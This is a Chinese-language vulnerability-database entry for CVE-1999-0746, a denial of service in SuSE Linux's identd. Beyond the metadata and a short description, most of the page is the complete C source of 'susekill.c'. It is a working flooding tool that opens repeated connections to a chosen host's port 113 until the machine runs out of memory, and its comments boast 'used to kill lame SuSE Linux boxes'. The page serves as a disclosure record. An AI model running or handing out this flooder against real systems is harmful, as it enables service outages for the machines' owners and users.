SuSE identd服务攻击拒绝漏洞
漏洞ID | 1105510 | 漏洞类型 | 配置错误 |
发布时间 | 1999-08-16 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-1999-0746 |
CNNVD-ID | CNNVD-199908-027 |
漏洞平台 | Linux | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
SuSELinux的in.identd默认配置在请求间隔间等待120秒,远程攻击者利用该漏洞进行服务拒绝。
|漏洞EXP
source: http://www.securityfocus.com/bid/587/info
In the inetd.conf under certain distributions of SuSE Linux the in.identd daemon is started with the -w -t120 option. This means that one identd process waits 120 seconds after answering the first request to answer the next request. If a malicious remote attacker starts a large number of ident requests in a short period of time it will force the target machine to start multiple daemons because the initial daemon is in a time wait state. This can eventually lead the machine to starve itself of memory resulting essentially in a machine halt.
/* susekill.c by friedolin
*
* used to kill lame SuSE Linux boxes with identd running
* identd must be started with -w -t120 to crash a machine
*
* have fun, friedolin <[email protected]>
*
* based on gewse.c by napster
*/
/* Tested systems:
*
* vulnerable:
*
* SuSE-Linux 4.4 - 6.2
* Slackware 3.2 and 3.6
*
* not vulnerable:
*
* RedHat 5.0 - 6.0
* Debian 2.0 - 2.1
*
* not tested:
*
* pre 4.3 SuSE systems
* pre 5.0 RedHat
* pre 2.0 Debian
* other Slackware releases
* Caldera Open Linux, ...
*
* please send me your results and experiences !
*
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#define GETIDENT "1027, 6667 : USERID : UNIX : killsuse"
int sockdesc;
int portkill;
int numkill;
int x;
void usage(char *progname)
{
printf("susekill by friedolin (based on gewse.c)n");
printf("usage: %s <host> <# of connections>n",progname);
exit(69);
}
main(int argc, char *argv[])
{
struct sockaddr_in sin;
struct hostent *he;
if (argc<3) usage(argv[0]);
sin.sin_port = htons(113);
sin.sin_family = AF_INET;
he = gethostbyname(argv[1]);
if (he) {
sin.sin_family = AF_INET;
sin.sin_port = htons(113);
memcpy((caddr_t)&sin.sin_addr.s_addr, he->h_addr, he->h_length);
} else {
perror("resolving");
}
numkill = atoi(argv[2]);
printf("Flooding %s [%s] identd %d times.n", argv[1], inet_ntoa(sin.sin_addr.s_addr), numkill);
printf("Killing");
fflush(stdout);
for (x=1;x<=numkill;x++) {
sockdesc = socket(AF_INET, SOCK_STREAM, 0);
if (sockdesc < 0) {
perror("socket");
exit(69);
}
if (connect(sockdesc, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
perror("connect");
exit(69);
}
printf(" .");
fflush(stdout);
(void) write(sockdesc, GETIDENT, strlen(GETIDENT));
}
printf("n");
}
|参考资料
来源:BID
名称:587
链接:http://www.securityfocus.com/bid/587
相关推荐: BugZilla Process_Bug.CGI Restricted Bug Comments Revealing Vulnerability
BugZilla Process_Bug.CGI Restricted Bug Comments Revealing Vulnerability 漏洞ID 1102975 漏洞类型 Input Validation Error 发布时间 2001-08-29 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛9月前0
kankan啊啊啊啊3年前0
66666666666666